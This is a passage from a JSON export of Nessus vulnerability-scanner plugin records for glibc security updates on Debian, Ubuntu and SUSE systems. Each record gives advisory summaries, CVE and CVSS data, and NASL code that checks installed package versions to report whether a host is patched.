prefix:\"libc6\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-amd64\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dbg\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-amd64\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-i386\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i386\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i686\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-pic\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-prof\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-udeb\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-xen\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-dns-udeb\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-files-udeb\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales-all\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"nscd\", reference:\"2.11.3-4+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:30:54", "bulletinFamily": "scanner", "description": "Siddhesh Poyarekar discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. This issue only affected Ubuntu\n10.04 LTS and Ubuntu 12.04 LTS. (CVE-2012-6656)\n\nAdhemerval Zanella Netto discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. (CVE-2014-6040)\n\nTim Waugh discovered that the GNU C Library incorrectly enforced the\nWRDE_NOCMD flag when handling the wordexp function. An attacker could\npossibly use this issue to execute arbitrary commands. (CVE-2014-7817).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-2432-1.NASL", "href": "https://www.tenable.com/plugins/nessus/79718", "published": "2014-12-04T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS / 14.10 : eglibc, glibc vulnerabilities (USN-2432-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2432-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79718);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:31\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\");\n script_bugtraq_id(69470, 69472, 71216);\n script_xref(name:\"USN\", value:\"2432-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS / 14.10 : eglibc, glibc vulnerabilities (USN-2432-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Siddhesh Poyarekar discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. This issue only affected Ubuntu\n10.04 LTS and Ubuntu 12.04 LTS. (CVE-2012-6656)\n\nAdhemerval Zanella Netto discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. (CVE-2014-6040)\n\nTim Waugh discovered that the GNU C Library incorrectly enforced the\nWRDE_NOCMD flag when handling the wordexp function. An attacker could\npossibly use this issue to execute arbitrary commands. (CVE-2014-7817).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2432-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected libc6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2019 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6\", pkgver:\"2.11.1-0ubuntu7.19\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libc6\", pkgver:\"2.15-0ubuntu10.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libc6\", pkgver:\"2.19-0ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"libc6\", pkgver:\"2.19-10ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libc6\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:17:54", "bulletinFamily": "scanner", "description": "glibc has been updated to fix security issues and bugs :\n\n - Fix crashes on invalid input in IBM gconv modules.\n (CVE-2014-6040 / CVE-2012-6656, bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Avoid infinite loop in nss_dns getnetbyname.\n (CVE-2014-9402)\n\n - Don", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_GLIBC-150129.NASL", "href": "https://www.tenable.com/plugins/nessus/81295", "published": "2015-02-11T00:00:00", "title": "SuSE 11.3 Security Update : glibc (SAT Patch Number 10259)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81295);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/02/28 05:39:56 $\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-9402\");\n\n script_name(english:\"SuSE 11.3 Security Update : glibc (SAT Patch Number 10259)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix security issues and bugs :\n\n - Fix crashes on invalid input in IBM gconv modules.\n (CVE-2014-6040 / CVE-2012-6656, bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Avoid infinite loop in nss_dns getnetbyname.\n (CVE-2014-9402)\n\n - Don't touch user-controlled stdio locks in forked child.\n (bsc#864081, GLIBC BZ #12847)\n\n - Unlock mutex before going back to waiting for PI\n mutexes. (bsc#891843, GLIBC BZ #14417)\n\n - Implement x86 cpuid handling of leaf4 for cache\n information. (bsc#903288, GLIBC BZ #12587)\n\n - Fix infinite loop in check_pf. (bsc#909053, GLIBC BZ\n #12926)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=864081\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=891843\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=903288\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=909053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-6656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-6040.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-9402.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10259.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-i18ndata-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-locale-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"nscd-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"nscd-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-html-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-i18ndata-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-info-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-locale-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-profile-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nscd-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.80.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "glibc has been updated to fix a security issue and two bugs :\n\nSecurity issue fixed :\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043)\n\nBugs fixed :\n\n - don", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0167-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83674", "published": "2015-05-20T00:00:00", "title": "SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0167-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0167-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83674);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-4043\", \"CVE-2014-6040\");\n script_bugtraq_id(68006, 69470, 69472);\n\n script_name(english:\"SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0167-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix a security issue and two bugs :\n\nSecurity issue fixed :\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043)\n\nBugs fixed :\n\n - don't touch user-controlled stdio locks in forked child\n (bsc#864081, GLIBC BZ #12847)\n\n - Fix infinite loop in check_pf (bsc#909053, GLIBC BZ\n #12926)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=864081\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=882600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909053\"\n );\n # https://download.suse.com/patch/finder/?keywords=880eb49b49e66cc28d6f1daf5ce1ccae\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa3fbe5e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150167-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2d945b6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11 SP2 LTSS :\n\nzypper in -t patch slessp2-glibc-10220\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-devel-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-html-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-i18ndata-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-info-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-locale-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-profile-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"nscd-2.11.3-17.45.57.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:00:42", "bulletinFamily": "scanner", "description": "glibc was updated to fix three security issues :\n\n - A directory traversal in locale environment handling was\n fixed (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could\n be used for code execution (CVE-2014-5119, bnc#892073,\n GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, bnc#894553, BZ #17325)", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2014-536.NASL", "href": "https://www.tenable.com/plugins/nessus/77659", "published": "2014-09-12T00:00:00", "title": "openSUSE Security Update : glibc (openSUSE-SU-2014:1115-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-536.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77659);\n script_version(\"1.6\");\n 